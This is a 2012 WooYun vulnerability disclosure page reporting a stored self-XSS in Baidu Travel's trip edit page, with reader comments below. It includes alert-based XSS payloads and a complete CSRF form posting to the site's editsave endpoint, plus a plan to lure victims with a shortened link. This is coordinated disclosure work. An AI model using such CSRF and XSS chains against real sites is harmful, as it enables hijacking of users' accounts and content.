当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010148

漏洞标题:用CSRF利用百度旅游中的YY型XSS

相关厂商:百度

漏洞作者: P1n9y_fly

提交时间:2012-07-25 21:54

修复时间:2012-09-08 21:54

公开时间:2012-09-08 21:54

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-07-25: 细节已通知厂商并且等待厂商处理中
2012-07-26: 厂商已经确认,细节仅向厂商公开
2012-08-05: 细节向核心白帽子及相关领域专家公开
2012-08-15: 细节向普通白帽子公开
2012-08-25: 细节向实习白帽子公开
2012-09-08: 细节向公众公开

简要描述:

用CSRF利用YY型XSS一处……囧……

详细说明:

是在旅游中 旅程 的编辑中YY的
作为一名新的web安全爱好者新手,看书之余,每天四处逛网站复制粘贴是必备的,发现有很多的XSS都是只能XSS自己,感觉很郁闷比如下面这一个百度旅游的。


在创建新的旅程的时候,将“旅程描述”这一栏设为
"/><IFRAME SRC=http://www.qq.com onload=alert(1898)></IFRAME>后,到浏览页面下查看发现已经被过滤了


但是在点击编辑之后,成功的弹出了如上窗口,查看源代码发现是desc木有过滤,导致出现了这个YY型的XSS。


如何利用这个YY型XSS呢。
在编辑提交之后我用Fiddler抓到了这样一个包:


木有token,除了最后一个是什么意思不明白其他还好说,我们到浏览页面源代码中搜索最下面的两个值,发现一个是trnid的值一个是sid的值,都是可以查到的,那么我就构建了一个表单:

<head>
<meta charset="GB2312"/>
<title>test</title>
</head>
<form method="post" action="http://lvyou.baidu.com/footprint/trip/post/editsave" target="_self">
	<input name="start_time" value='1999-03-01'>
	<input name="time" value="102">
	<input name="time_unit" value="d">
	<input name="departure" value="">
	<input name="departure_sid" value="1fdbf740851f3e07d8d23ff7">
	<input name="desc" value=" ">
	<input name="zoom" value="5">
	<input name="trid" value="af3142e1dfcadf25f3208251">
	<input name="node_array[]" value="68be7ae3b9d414ff762fdd82,e1b1b2be2306a40f9b9d32db">
	<input name="submit" type="submit" value="submit" onclick=submit()/>
</form>


将desc的值设为"/><script/defer>alert(1898)</script>并修改其他值,点击提交之后发现旅程描述变了。


然后点开编辑发现成功弹窗


我们试想一下,我们找到一篇旅程,查看到他的各项参数,比如trid,nid等等,然后构造一个POST表单放入sinaapp中,设置成短网址后给这个人发一条评论,他点了之后自动提交表单,他的旅程描述就被改为了恶意代码,之后他发现不对,点击编辑改回去,恶意代码就执行了。

漏洞证明:

这个不好证明。。其实很好自测的吧。。
http://lvyou.baidu.com/user/trip/66a1950cff3325d7323ccbfb

修复方案:

1.弄掉CSRF
2.弄掉YY型XSS。。。

版权声明:转载请注明来源 P1n9y_fly@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-07-26 10:21

厂商回复:

思路不错,感谢你对百度安全的关注,我们尽快修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-07-25 22:02 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    yy。。

  2. 2012-07-25 22:06 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    rookit?

  3. 2012-07-25 22:15 | FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )

    @水滴 怎么个情况。。。。

  4. 2012-07-25 22:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @FlyR4nk 这个思路真有点儿意思

  5. 2012-07-25 22:24 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @FlyR4nk 我看不见啊啊啊

  6. 2012-07-25 22:24 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @xsser 求

  7. 2012-07-25 22:25 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @xsser 哈,思路有意思的,重点关注~~

  8. 2012-07-25 22:25 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @gainover 。。。。。。

  9. 2012-07-25 22:41 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @水滴 = = 别。。。。。 了,我猜,是csrf+xss rookit,然后加上某些某些其他东西吧。。

  10. 2012-07-26 10:24 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    @P1n9y_fly 妖姐,你赢了

  11. 2012-07-26 10:33 | P1n9y_fly ( 实习白帽子 | Rank:97 漏洞数:11 | ضصششسسزرذخكللممنيئؤؤ...)

    @goderci 不要暴露我的外号好么T-T。。。完了。。。

  12. 2012-07-26 10:47 | FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )

    @xsser 赞思路,等待公开。

  13. 2012-07-26 10:51 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @goderci 难道是妹子~~

  14. 2012-07-26 10:58 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @goderci 漏洞数28,我不小心看成了2B

  15. 2012-07-26 10:59 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    @一刀终情 fu_k!那一会我再发个漏洞。

  16. 2012-07-26 11:00 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    @gainover 必须是

  17. 2012-07-26 11:10 | P1n9y_fly ( 实习白帽子 | Rank:97 漏洞数:11 | ضصششسسزرذخكللممنيئؤؤ...)

    @goderci @gainover 纯爷们- -之前玩游戏玩了个女号一直被他们叫道现在- -

  18. 2012-07-26 13:12 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    我是来围观妖姐的

  19. 2012-08-15 15:20 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    确实有意思~

  20. 2012-08-25 10:58 | 大和尚 ( 实习白帽子 | Rank:49 漏洞数:5 | www.ieroot.com 积极向上的心态!百折不挠...)

    好牛..